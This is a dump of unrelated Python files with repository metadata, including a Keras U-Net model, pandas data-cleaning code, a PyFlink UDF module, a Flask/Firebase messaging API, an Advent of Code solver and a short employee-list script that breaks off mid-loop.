from uptrends.rest import ApiException
class TestSubStepType(unittest.TestCase):
    """SubStepType unit test stubs (auto-generated by swagger-codegen)."""
    def setUp(self):
        # No fixtures needed for the generated stub.
        pass
    def tearDown(self):
        # Nothing to clean up.
        pass
    def testSubStepType(self):
        """Test SubStepType"""
        # FIXME: construct object with mandatory attributes with example values
        # model = uptrends.models.sub_step_type.SubStepType() # noqa: E501
        pass
if __name__ == '__main__':
    # Run the stubs with the standard unittest runner.
    unittest.main()
| [
"SandCr01@risk.regn.net"
] | SandCr01@risk.regn.net |
808df8fd000d1100b98a1532e9de2156af996c80 | 8ee9a85496208ed5f4331d437ec44cc17f7bce08 | /FinalPractice/SemanticSegmentation/U_net/model.py | 76320a94bd7d5507c70b0f20bc245ce78291b4fc | [] | no_license | Ollitros/ComputerVision | aa93527ef0172874a0034b61d1cae6c31f514734 | b0ec5d9f94406b4f8164d0ef7180226156ea1194 | refs/heads/master | 2020-04-03T19:23:06.898807 | 2019-06-13T04:56:29 | 2019-06-13T04:56:29 | 155,521,472 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | from tensorflow.keras.layers import Conv2D, MaxPool2D, UpSampling2D, \
Input, BatchNormalization, concatenate, Activation
from tensorflow.keras.models import Model
def model():
    """Build a U-Net for 128x128 RGB semantic segmentation.

    Encoder: four down blocks (64 -> 512 filters), each two Conv-BN-ReLU
    stages followed by 2x2 max pooling (spatial size 128 -> 8).
    Bottleneck: two 1024-filter stages.  Decoder: four up blocks that
    upsample, concatenate the matching encoder features (skip connection)
    and apply three Conv-BN-ReLU stages.  Head: 1x1 conv with sigmoid,
    producing a per-pixel foreground probability map.

    Returns the (uncompiled) tf.keras Model.

    The repeated Conv2D/BatchNormalization/Activation triples of the
    original are factored into one helper; the resulting graph is
    layer-for-layer identical.
    """

    def conv_stack(x, filters, repeats):
        # `repeats` x (3x3 same-padding Conv -> BatchNorm -> ReLU)
        for _ in range(repeats):
            x = Conv2D(filters, (3, 3), padding='same')(x)
            x = BatchNormalization()(x)
            x = Activation('relu')(x)
        return x

    inputs = Input(shape=(128, 128, 3))

    # Encoder: 128 -> 64 -> 32 -> 16 -> 8
    down1 = conv_stack(inputs, 64, 2)
    down1_pool = MaxPool2D()(down1)
    down2 = conv_stack(down1_pool, 128, 2)
    down2_pool = MaxPool2D()(down2)
    down3 = conv_stack(down2_pool, 256, 2)
    down3_pool = MaxPool2D()(down3)
    down4 = conv_stack(down3_pool, 512, 2)
    down4_pool = MaxPool2D()(down4)

    # Bottleneck at 8x8
    center = conv_stack(down4_pool, 1024, 2)

    # Decoder with skip connections: 8 -> 16 -> 32 -> 64 -> 128
    up4 = UpSampling2D((2, 2))(center)
    up4 = concatenate([down4, up4], axis=3)
    up4 = conv_stack(up4, 512, 3)

    up3 = UpSampling2D((2, 2))(up4)
    up3 = concatenate([down3, up3], axis=3)
    up3 = conv_stack(up3, 256, 3)

    up2 = UpSampling2D((2, 2))(up3)
    up2 = concatenate([down2, up2], axis=3)
    up2 = conv_stack(up2, 128, 3)

    up1 = UpSampling2D((2, 2))(up2)
    up1 = concatenate([down1, up1], axis=3)
    up1 = conv_stack(up1, 64, 3)

    # Per-pixel binary classification head
    classify = Conv2D(1, (1, 1), activation='sigmoid')(up1)

    return Model(inputs=inputs, outputs=classify)
| [
"Ollitros@gmail.com"
] | Ollitros@gmail.com |
3190ff79a325639ebf414c7f80900add89bff713 | 080de342ebd4397b62c02765c47c9378f4cc0ef1 | /Project/functions/getting_tables.py | dec231d8fc8817cb8e2726a7c48d63dc49e1bb1e | [] | no_license | timothee-florian/Applied-Data-Analysis-2018 | 3367c1f53deed7eca935e3c47698d11fa0620111 | 433afcc50daf4f82099711a8aee21b750fbdad73 | refs/heads/master | 2020-04-23T09:31:54.481087 | 2019-03-29T12:41:03 | 2019-03-29T12:41:03 | 171,071,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,003 | py | import pandas as pd
import numpy as np
from math import pi
import matplotlib.pyplot as plt
def country_stat_creation(protests_df,country_by_income_2017,countries_stats,country_codes_to_name):
    """Assemble one per-country statistics table.

    Joins the protest counts, the 2017 income group and the country
    statistics into a single frame, keeping only countries with complete
    data and more than one recorded protest.
    """
    # Number of protest events recorded per ISO3 country code.
    protest_counts = (protests_df
                      .groupby(['Country Code'])
                      .size()
                      .reset_index(name='protests count'))
    # Income group joined onto the counts; the right join keeps every
    # country that has at least one protest.
    income_and_counts = pd.merge(
        country_by_income_2017[['Country Code', 'Income Group']],
        protest_counts, how='right', on=['Country Code'])
    # Attach ISO3 codes to the statistics table, dropping unmatched rows.
    stats_with_code = pd.merge(countries_stats, country_codes_to_name,
                               how='left', on='Country Name').dropna()
    # Final join + completeness filter.
    merged = pd.merge(stats_with_code, income_and_counts, how='left',
                      left_on='Country Code', right_on='Country Code').dropna()
    # Countries with a single protest carry no signal for the regression.
    return merged[merged['protests count'] > 1]
def load_countrycode(DATA_PATH):
    """Load the country-code conversion tables from *DATA_PATH*.

    Returns (country_codes_to_name, country_codes_fips104_to_iso3), both
    with their ISO3 column renamed to 'Country Code' so they merge cleanly
    with the other tables.
    """
    # Conversion between FIPS 10-4 and ISO2 codes for countries.
    country_codes_fips104_to_iso = pd.read_csv(DATA_PATH + "fips104_to_iso.csv", encoding = "ISO-8859-1")
    # Conversion between ISO2 and ISO3 codes for countries.
    country_codes_iso2_to_iso3 = pd.read_csv(DATA_PATH + "country_codes_iso2_to_iso3.csv", encoding = "ISO-8859-1")
    # Chain the two tables so we can convert FIPS 10-4 directly to ISO3.
    country_codes_fips104_to_iso3 = pd.merge(country_codes_fips104_to_iso, country_codes_iso2_to_iso3, how='inner',\
        left_on=['ISO 3166'], right_on=['ISO'])[['FIPS 10-4', 'ISO3']]
    # Conversion between country code and country name (with lat/long).
    country_codes_to_name = pd.read_csv(DATA_PATH + "country_lat_long.csv", encoding = "ISO-8859-1")
    country_codes_to_name=country_codes_to_name.rename(index=str, columns={"ISO3": "Country Code"})
    country_codes_fips104_to_iso3=country_codes_fips104_to_iso3.rename(index=str, columns={"ISO3": "Country Code"})
    return country_codes_to_name, country_codes_fips104_to_iso3
def open_and_clean_data(DATA_PATH):
    """Load and trim the indicator datasets under *DATA_PATH*.

    Reads the HDI, GINI, GDP-growth, corruption and protest-location CSVs
    (dropping the year columns outside the period of interest), then parses
    the press-freedom index out of the fixed-layout text file ``parse.txt``.

    Returns (press_freedom_df, hdi_df, gini_df, gdp_df, corruption_df,
    protests_df_location).
    """
    hdi_df = pd.read_csv(DATA_PATH + "Human_Development_Index_(HDI).csv", encoding = "ISO-8859-1")
    hdi_df = hdi_df.drop(hdi_df.iloc[:,2:17], axis = 1)
    gini_df = pd.read_csv(DATA_PATH + "GINI_per_country_worldbank.csv", encoding = "ISO-8859-1")
    gini_df = gini_df.drop(gini_df.iloc[:,2:49], axis = 1)
    gdp_df = pd.read_csv(DATA_PATH + "GDP_growth_world_bank.csv", encoding = "ISO-8859-1")
    gdp_df = gdp_df.drop(gdp_df.iloc[:,2:49], axis = 1)
    corruption_df = pd.read_csv(DATA_PATH + "DataCorruptionPerceptionIndex2000_2017.csv", encoding = "ISO-8859-1")
    corruption_df = corruption_df.drop(corruption_df.iloc[:,1:6], axis = 1)
    protests_df_location = pd.read_csv(DATA_PATH + 'protests_location.csv')
    protests_df_location=protests_df_location.dropna()
    # Initialize an empty dataframe with one column per report year.
    # 2011 is listed but stays empty: the 2012 report covered 2011-2012
    # in a single column (see the note at the end of this function).
    columns_data=['Country','2018', '2017', '2016', '2015', '2014','2013', '2012','2011', '2010', '2009','2008', '2007', '2006', '2005', '2004','2003', '2002']
    press_freedom_df = pd.DataFrame(columns = columns_data, index = range(0,200))
    filepath = DATA_PATH+'parse.txt'
    #press_freedom_df
    index = []
    values = []
    # parse.txt layout: a country-name line (starting with a space,
    # tab-separated from its rank) followed by one index line per year.
    with open(filepath) as fp:
        line = fp.readline()
        column = 0
        cnt = 0
        line = fp.readline()
        while cnt <= 179: #179 countries in the file
            if(line[0] == ' '): #if we detect the space in front of country name
                cnt+=1 # row = row + 1
                column = 0
                values.append(line.split('\t')[0]) #Only keep the name of the country and not the shifted rank
                line = fp.readline()
            else:
                while(line[0] != ' '): #While these are the indices corresponding to the country detected above
                    column += 1
                    values.append(line.split()[0]) #Only keeps the index and not the ranking
                    line = fp.readline()
                row = pd.Series( (v for v in values) )
                values = []
                n = 0
                for i in range(len(row)):
                    if(i == 0):
                        press_freedom_df['Country'].iloc[cnt] = row.iloc[0] #name in country column
                    else:
                        # Skip the missing 2011 column: once we pass it,
                        # shift the year mapping by one.
                        if(2019 - i == 2011):
                            n = 1
                        press_freedom_df[str(2019-i-n)].iloc[cnt] = row.iloc[i] # index corresponding to year
    # NOTE(review): redundant — the with-block already closed the file.
    fp.close()
    press_freedom_df = press_freedom_df.drop(0)
    press_freedom_df = press_freedom_df.head(179)
    """For press freedom This looks really messy, but in fact, the values under each country name are the indices from 2018 t 2002 and the number in parenthsis is the rank for each year. We create a dataframe with press-freedom indices corresponding to each country and each year.
    In the algorithm bellow we parse these data to generate the dataframe
    According to wikipeddia, 2011 is missing because the report released in 2012 is titled '2011–2012' and cover both 2011 and 2012 in one column. We will later see what we can do to recover these missing data."""
    return press_freedom_df, hdi_df, gini_df, gdp_df,corruption_df,protests_df_location
| [
"noreply@github.com"
] | timothee-florian.noreply@github.com |
ebe1fb9cc23593c64d8d943ed016f532d66998e6 | c8f3732435346cdeb2c81b6b403ceccc8a0f39f9 | /9월/소민/Valid Anagram.py | 9554738efda024312d8b495a0c52b956321d219f | [] | no_license | weejw/NetDB-Algorithm-Study | 6d0e2b5d48bdb4b250da5fd843705c26781debe7 | 85b0b1832d838970318ac4628142c0b914f90233 | refs/heads/master | 2022-12-26T15:15:27.576472 | 2020-10-12T04:29:54 | 2020-10-12T04:29:54 | 291,655,038 | 0 | 2 | null | 2020-09-02T06:11:30 | 2020-08-31T08:13:24 | Python | UTF-8 | Python | false | false | 219 | py | class Solution:
def isAnagram(self, s: str, t: str) -> bool:
if len(s) != len(t):
return False
elif sorted(s) == sorted(t):
return True
else:
return False
| [
"ppsoming@gamil.com"
] | ppsoming@gamil.com |
24a1f766afd91bb14af906157c92b21157847e12 | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/Gather-Deployment-master/tensorflow/24.pyflink/notebooks/udf.py | c5bd455da383c118815ae7e7411968c2b4808d33 | [
"MIT"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,501 | py | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import abc
import collections
import collections.abc
import functools
import inspect

from pyflink.java_gateway import get_gateway
from pyflink.table.types import DataType, _to_java_type
from pyflink.util import utils
__all__ = ['FunctionContext', 'ScalarFunction', 'udf']
class FunctionContext(object):
    """
    Used to obtain global runtime information about the context in which the
    user-defined function is executed. The information includes the metric group,
    and global job parameters, etc.

    Currently a placeholder: no context information is exposed yet.
    """
    pass
class UserDefinedFunction(abc.ABC):
    """
    Base interface for user-defined function.
    """

    def open(self, function_context):
        """
        Initialization method for the function. It is called once, before the
        actual working methods, and thus suitable for one time setup work.

        :param function_context: the context of the function
        :type function_context: FunctionContext
        """
        pass

    def close(self):
        """
        Tear-down method for the user code. It is called once, after the last
        call to the main working methods.
        """
        pass

    def is_deterministic(self):
        """
        Returns information about the determinism of the function's results.
        It returns true if and only if a call to this function is guaranteed to
        always return the same result given the same parameters. true is assumed
        by default. If the function is not pure functional like random(),
        date(), now(), this method must return false.

        :return: the determinism of the function's results.
        :rtype: bool
        """
        # Pure by default; impure subclasses must override.
        return True
class ScalarFunction(UserDefinedFunction):
    """
    Base interface for user-defined scalar function. A user-defined scalar function maps zero,
    one, or multiple scalar values to a new scalar value.
    """

    @abc.abstractmethod
    def eval(self, *args):
        """
        Method which defines the logic of the scalar function.

        Subclasses receive one positional argument per declared input type
        and must return a value matching the declared result type.
        """
        pass
class DelegatingScalarFunction(ScalarFunction):
    """
    Helper scalar function implementation for lambda expression and python function. It's for
    internal use only.

    Adapts a plain callable to the ScalarFunction interface by forwarding
    eval() to the wrapped function.
    """

    def __init__(self, func):
        # The wrapped plain callable (function or lambda).
        self.func = func

    def eval(self, *args):
        return self.func(*args)
class UserDefinedFunctionWrapper(object):
    """
    Wrapper for Python user-defined function. It handles things like converting lambda
    functions to user-defined functions, creating the Java user-defined function representation,
    etc. It's for internal use only.
    """

    def __init__(self, func, input_types, result_type, deterministic=None, name=None):
        """
        :param func: a UserDefinedFunction instance or any non-class callable.
        :param input_types: one DataType or an iterable of DataType.
        :param result_type: the result DataType.
        :param deterministic: optional; when *func* is a UserDefinedFunction it
                              must agree with func.is_deterministic().
        :param name: optional function name; defaults to the callable's name.
        """
        if inspect.isclass(func) or (
            not isinstance(func, UserDefinedFunction) and not callable(func)
        ):
            raise TypeError(
                'Invalid function: not a function or callable (__call__ is not defined): {0}'.format(
                    type(func)
                )
            )

        # Accept a single DataType as shorthand for a one-element list.
        # Bug fix: the abstract base classes were removed from the bare
        # `collections` namespace in Python 3.10; they live in
        # `collections.abc`.
        if not isinstance(input_types, collections.abc.Iterable):
            input_types = [input_types]

        for input_type in input_types:
            if not isinstance(input_type, DataType):
                raise TypeError(
                    'Invalid input_type: input_type should be DataType but contains {}'.format(
                        input_type
                    )
                )

        if not isinstance(result_type, DataType):
            raise TypeError(
                'Invalid returnType: returnType should be DataType but is {}'.format(
                    result_type
                )
            )

        self._func = func
        self._input_types = input_types
        self._result_type = result_type
        # Lazily-built Java representation; created on first _judf() call.
        self._judf_placeholder = None
        self._name = name or (
            func.__name__
            if hasattr(func, '__name__')
            else func.__class__.__name__
        )

        if (
            deterministic is not None
            and isinstance(func, UserDefinedFunction)
            and deterministic != func.is_deterministic()
        ):
            raise ValueError(
                'Inconsistent deterministic: {} and {}'.format(
                    deterministic, func.is_deterministic()
                )
            )

        # default deterministic is True
        self._deterministic = (
            deterministic
            if deterministic is not None
            else (
                func.is_deterministic()
                if isinstance(func, UserDefinedFunction)
                else True
            )
        )

    def _judf(self, is_blink_planner, table_config):
        """Return the Java function object, creating it on first use."""
        if self._judf_placeholder is None:
            self._judf_placeholder = self._create_judf(
                is_blink_planner, table_config
            )
        return self._judf_placeholder

    def _create_judf(self, is_blink_planner, table_config):
        """Serialize the Python function and build its Java wrapper via Py4J."""
        func = self._func
        if not isinstance(self._func, UserDefinedFunction):
            # Wrap plain callables so the Java side always sees a ScalarFunction.
            func = DelegatingScalarFunction(self._func)

        import cloudpickle
        serialized_func = cloudpickle.dumps(func)

        gateway = get_gateway()
        j_input_types = utils.to_jarray(
            gateway.jvm.TypeInformation,
            [_to_java_type(i) for i in self._input_types],
        )
        j_result_type = _to_java_type(self._result_type)
        # The blink planner variant takes the table config as an extra
        # leading argument; otherwise the two calls are identical.
        if is_blink_planner:
            PythonTableUtils = (
                gateway.jvm.org.apache.flink.table.planner.utils.python.PythonTableUtils
            )
            j_scalar_function = PythonTableUtils.createPythonScalarFunction(
                table_config,
                self._name,
                bytearray(serialized_func),
                j_input_types,
                j_result_type,
                self._deterministic,
                _get_python_env(),
            )
        else:
            PythonTableUtils = gateway.jvm.PythonTableUtils
            j_scalar_function = PythonTableUtils.createPythonScalarFunction(
                self._name,
                bytearray(serialized_func),
                j_input_types,
                j_result_type,
                self._deterministic,
                _get_python_env(),
            )
        return j_scalar_function
# TODO: support to configure the python execution environment
def _get_python_env():
gateway = get_gateway()
exec_type = (
gateway.jvm.org.apache.flink.table.functions.python.PythonEnv.ExecType.PROCESS
)
return gateway.jvm.org.apache.flink.table.functions.python.PythonEnv(
exec_type
)
def _create_udf(f, input_types, result_type, deterministic, name):
return UserDefinedFunctionWrapper(
f, input_types, result_type, deterministic, name
)
def udf(
f = None,
input_types = None,
result_type = None,
deterministic = None,
name = None,
):
"""
Helper method for creating a user-defined function.
Example:
::
>>> add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())
>>> @udf(input_types=[DataTypes.BIGINT(), DataTypes.BIGINT()],
... result_type=DataTypes.BIGINT())
... def add(i, j):
... return i + j
>>> class SubtractOne(ScalarFunction):
... def eval(self, i):
... return i - 1
>>> subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())
:param f: lambda function or user-defined function.
:type f: function or UserDefinedFunction or type
:param input_types: the input data types.
:type input_types: list[DataType] or DataType
:param result_type: the result data type.
:type result_type: DataType
:param name: the function name.
:type name: str
:param deterministic: the determinism of the function's results. True if and only if a call to
this function is guaranteed to always return the same result given the
same parameters. (default True)
:type deterministic: bool
:return: UserDefinedFunctionWrapper or function.
:rtype: UserDefinedFunctionWrapper or function
"""
# decorator
if f is None:
return functools.partial(
_create_udf,
input_types = input_types,
result_type = result_type,
deterministic = deterministic,
name = name,
)
else:
return _create_udf(f, input_types, result_type, deterministic, name)
| [
"jinxufang@tencent.com"
] | jinxufang@tencent.com |
6c137c6126c25690c337197affaf147d9e37e27b | e38f7b5d46fd8a65c15e49488fc075e5c62943c9 | /pychron/processing/fits/interpolation_fit_selector.py | d87ba575e0cfa7ff8c9751b69ae6c15e42f3c200 | [] | no_license | INGPAN/pychron | 3e13f9d15667e62c347f5b40af366096ee41c051 | 8592f9fc722f037a61b0b783d587633e22f11f2f | refs/heads/master | 2021-08-15T00:50:21.392117 | 2015-01-19T20:07:41 | 2015-01-19T20:07:41 | 111,054,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | #===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
#============= enthought library imports =======================
#============= standard library imports ========================
#============= local library imports ==========================
from pychron.processing.fits.fit import Fit
from pychron.processing.fits.fit_selector import FitSelector
from pychron.pychron_constants import FIT_TYPES_INTERPOLATE
class InterpolationFit(Fit):
def _get_fit_types(self):
return FIT_TYPES_INTERPOLATE
class InterpolationFitSelector(FitSelector):
fit_klass = InterpolationFit
fit_types = FIT_TYPES_INTERPOLATE
#============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
2461dd6d31bb8de582e3c2c2b4eb9cae54a7dcf7 | bb65c5e103768ed32a0538389d18d08095a9b101 | /server/main.py | f4f7288368d6a4616071eeb32528ccd0b36e3371 | [] | no_license | DaniloMaglia/WUD | 235b6219cdcda08f4d1551cc1417087afdfbaef7 | 6eb112610d96586bd5bc63b26b64b95b73fe83c8 | refs/heads/master | 2023-09-04T23:38:48.585403 | 2021-11-09T14:23:12 | 2021-11-09T14:23:12 | 415,654,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,335 | py | from firebase_admin.exceptions import FirebaseError
from flask import request, Flask
from flask_cors import CORS, cross_origin
from message import Message
from db_driver import APIException, FirebaseConnection
from db_driver import User
from firebase_admin.exceptions import FirebaseError
INVALID_TOKEN = {
"code": "invalid_token",
"message": "Invalid token. Token validity check failed, check if the token is not expired",
}
INVALID_USER = {
"code": "invalid_user",
"message": "Invalid user. The associated username has not been found in the database"
}
INVALID_DEST = {
"code": "invalid_dest",
"message": "The destinatary of the message is not valid, please check the unique id",
}
INVALID_PARAMETER = {
"code": "invalid_parameter",
"message": "You sent invalid parameter to the API, check carefully to see where is the error",
}
USER_EXISTS = {
"code": "user_exists",
"message": "The user (name) you sent is already being used",
}
EMAIL_EXISTS = {
"code": "email_exists",
"message": "The user (email) you sent is already being used",
}
INVALID_LOGIN = {
"code": "invalid_login",
"message": "Invalid email or password"
}
app = Flask(__name__)
cors = CORS(app)
app.config["DEBUG"] = True
fb = FirebaseConnection(
"./res/key/key.json",
"https://whatudoing-default-rtdb.europe-west1.firebasedatabase.app/",
)
@app.route("/post_message", methods=["POST"])
# Route per inviare un messaggio ad un utente.
# Come body prende un json con i seguenti parametri:
# token = token della persona che vuole inviare il messaggio
# dest = id dell'utente a cui è destinato il messaggio
# msg = il messaggio inviato
# Il messaggio verrà messo tra i "pending_message" e potrà
# essere preso solo quando il destinatario richiederà i
# propri messaggi.
@cross_origin()
def post_message():
token = request.json["token"]
dest = request.json["dest"]
msg = request.json["msg"]
try:
user = User.get_user_by_token(fb, token)
except APIException:
return INVALID_TOKEN
try:
user.send_message(fb, dest, msg)
return {"code": "success", "message": "Message sent successfully"}
except User.UserException:
return INVALID_DEST
@app.route("/get_message", methods=["POST"])
# Route per leggere i messaggi ricevuti.
# Come body prende un JSON con i seguenti parametri:
# token = token per la sicurezza
# Verrà ritornato il messaggio con il seguente formato
# {
# src: [src],
# msg: [msg]
# }
# In caso ci siano più messaggi verrà ritornata una lista.
@cross_origin()
def get_message():
print(request.json)
token = request.json[
"token"
] # token ancora da implementare, per ora sarà sostituito da un utente fisso
try:
user = User.get_user_by_token(fb, token)
pending_messages = user.get_pending_messages(fb)
if pending_messages is not None:
return pending_messages
else:
return INVALID_DEST
except APIException:
return INVALID_TOKEN
@app.route("/auth/signup", methods=["POST"])
# Route per aggiungere un utente alla piattaforma
# Utilizza il sistema di autenticazione di Firebase
# Come body prende un JSON con i seguenti parametri:
# username = username dell'utente
# email = email dell'utente
# password = password in chiaro dell'utente
# Restituisce un messaggio con il seguente formato:
# {
# code: "success"
# message: "User created successfully"
# }
@cross_origin()
def signup():
username = request.json["username"]
email = request.json["email"]
password = request.json["password"]
try:
User.sign_up(fb, username, email, password)
return {"code": "success", "message": "User created successfully"}
except User.UserException:
return USER_EXISTS
except FirebaseError:
return EMAIL_EXISTS
@app.route("/auth/signin", methods=["POST"])
# Route per eseguire l'accesso all'API.
# Ritorna un token che potrà essere utilizzato successivamente
# per identificarsi all'interno dell'API.
# Come body richiede un JSON con i seguenti paramentri:
# email: [email],
# password: [password]
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User signed in successfully",
# token: [token]
# }
@cross_origin()
def signin():
email = request.json["email"]
password = request.json["password"]
try:
token = User.sign_in(email, password)
return {
"code": "success",
"message": "User signed in successfully",
"token": token,
}
except APIException:
return INVALID_PARAMETER
except User.UserException:
return INVALID_LOGIN
@app.route("/user/get", methods=["POST"])
# Route per prendere i dati di un utente
# Come body richiede un JSON con i seguenti parametri:
# token = token che identifica la sessione di un utente (vedere signin)
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User retrieved successfully",
# user: {
# username: [username],
# email: [email]
# }
# }
@cross_origin()
def get_user():
token = request.json["token"]
try:
user = User.get_user_by_token(fb, token)
return {
"code": "success",
"message": "User retrieved sucessfully",
"user": user.__dict__(),
}
except APIException:
return INVALID_TOKEN
@app.route("/user/get_by_username", methods=["POST"])
# Route per prendere i dati di un utente
# Come body richiede un JSON con i seguenti parametri:
# username = username dell'utente da cercare
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User retrieved successfully",
# user: {
# username: [username],
# email: [email]
# }
# }
@cross_origin()
def get_user_by_username():
username = request.json["username"]
try:
user = User.get_user_by_username(fb, username)
return {
"code": "success",
"message": "User retrieved sucessfully",
"user": user.__dict__(),
}
except APIException:
return INVALID_USER
def main():
app.run(host="0.0.0.0", port=42069)
if __name__ == "__main__":
main()
| [
"magliadanilo@gmail.com"
] | magliadanilo@gmail.com |
7a77b149db2c726037c8e1a03596ff93526b0641 | 3dc08fff8e43e94154ae247d5f5d8588d63b49ec | /2017/AdvCodeDay4.py | 73e0c95fff34f92894be54525f462dc9bb6287c4 | [] | no_license | rwinklerwilkes/Advent-of-Code | 4ad5a51b83ebc1b1faa4c32e9e61d1f4f288b4ad | 45470f966ae33aa8a753fb2d81f3ddc9299817b9 | refs/heads/master | 2022-03-22T11:15:58.183224 | 2019-12-30T15:37:56 | 2019-12-30T15:37:56 | 114,539,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | ##Day Four
def bad_phrase(phrase):
s = phrase.split()
s = sorted(s)
dup = False
for i in range(len(s)-1):
if s[i]==s[i+1]:
dup = True
return dup
def bad_phrase_anagram(phrase):
s = phrase.split()
s = [''.join(sorted(word)) for word in s]
s = sorted(s)
dup = False
for i in range(len(s)-1):
if s[i]==s[i+1]:
dup = True
return dup
def good_passphrases(pass_input):
ctr = 0
for phrase in pass_input:
if not bad_phrase(phrase):
ctr += 1
return ctr
def good_passphrases_anagram(pass_input):
ctr = 0
for phrase in pass_input:
if not bad_phrase_anagram(phrase):
ctr += 1
return ctr
file = "Passphrase Input.txt"
passphrases = []
with open(file, 'r') as txtfile:
for row in txtfile:
passphrases.append(row.strip())
part_one = good_passphrases(passphrases)
part_two = good_passphrases_anagram(passphrases)
| [
"rich.w.sas@gmail.com"
] | rich.w.sas@gmail.com |
cd516a41afabb0cb99bb296211788b5dff0347b6 | cfc345aa7ec01a1ab111004d6f1bb52c7baca293 | /split_folders.py | 297fd22620ecb56194a53acad6b4fe4540af4888 | [] | no_license | iamgroot42/dlvr_project | 70ce20675c8f1ba218aa3333f24c622def6c88bd | 62aa8c24448b0aaee35df09a757527606f09f8bf | refs/heads/master | 2022-06-02T06:34:55.770882 | 2020-05-04T23:22:55 | 2020-05-04T23:22:55 | 259,161,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | import os
import random
from shutil import copyfile
from tqdm import tqdm
if __name__ == "__main__":
# Train-Test Split Ratio
split_ratio = 0.7
source_datapath = "./finegrained_data/"
destn_datapath = "./finegrained_data_split/"
print("[Start] Data Split and Shifting")
for basepath in os.listdir(source_datapath):
bp = os.path.join(source_datapath, basepath)
# Make directory for class
os.mkdir(os.path.join(destn_datapath, basepath))
# Make train, test directories inside class
os.mkdir(os.path.join(destn_datapath, basepath, "train"))
os.mkdir(os.path.join(destn_datapath, basepath, "test"))
for folder in tqdm(os.listdir(bp)):
concept = os.path.join(bp, folder)
# Shuffle list
files = os.listdir(concept)
random.shuffle(files)
# Split into train-test
split_point = int(len(files) * split_ratio)
train_files, test_files = files[:split_point], files[split_point:]
# Make directory for class
dest_concept_path = os.path.join(destn_datapath, basepath)
os.mkdir(os.path.join(dest_concept_path, "train", folder))
os.mkdir(os.path.join(dest_concept_path, "test", folder))
# Copy into destination folder to respectrive train/test directories
for file in train_files:
copyfile(os.path.join(concept, file), os.path.join(dest_concept_path, "train", folder, file))
for file in test_files:
copyfile(os.path.join(concept, file), os.path.join(dest_concept_path, "test", folder,file))
print("[End] Data Split and Shifting")
| [
"anshuman@email.virginia.edu"
] | anshuman@email.virginia.edu |
cdba6787cb45d6b039a3639d858ae0c457771963 | 9773059260c1f9395d182f7a65760b0917794a7f | /venv/bin/easy_install | 7b6db3a0dec0c3e534d13076015638fb1340631b | [] | no_license | Ruldane/DjangoCountWords | 05a452db5640b0efbff8f8e75061ed8dc2a40f6e | e54efb72caf678b7682642ce29b54b7d68170fa2 | refs/heads/master | 2020-06-10T19:50:41.289276 | 2019-06-25T14:54:39 | 2019-06-25T14:54:39 | 193,728,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | #!/home/ruldane/PycharmProjects/countword/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"l.nizzoli@gmail.com"
] | l.nizzoli@gmail.com | |
e3187338366529c0db25978df2bdc1b5d1708f9a | b5025befdf74fff3071252abaa4db09479f2d763 | /Aneena/Aug10/employee.py | d431fdd12490188cde22d81218f2acfc45dceeee | [] | no_license | sidv/Assignments | d2fcc643a2963627afd748ff4d690907f01f71d8 | d50d668264e2a31581ce3c0544f9b13de18da2b3 | refs/heads/main | 2023-07-30T02:17:19.392164 | 2021-09-23T04:47:56 | 2021-09-23T04:47:56 | 392,696,356 | 1 | 20 | null | 2021-09-23T08:14:11 | 2021-08-04T13:20:43 | Python | UTF-8 | Python | false | false | 971 | py |
employee = []
while True:
print("1.Add employee")
print("2.Delete employee")
print("3.Search employee")
print("4.Change employee data")
print("5.Display all employee details")
print("6.Exit")
choice = int(input("enter your choice\n"))
if choice == 1:
name=input("Enter the employee name\n")
if name != None:
employee.append(name)
if choice == 2:
print(employee)
print("Choose the employee name to delete")
name=input("Enter the employee name to delete\n")
employee.remove(name)
if choice == 3:
name=input("Enter the name to search\n")
if name in employee:
print(name + "is in the list\n")
else:
print(name + "is not in the list\n")
if choice == 4:
name = input("Enter the name to be changed\n")
index = employee.index(name)
new_name = input("Enter the new_name\n")
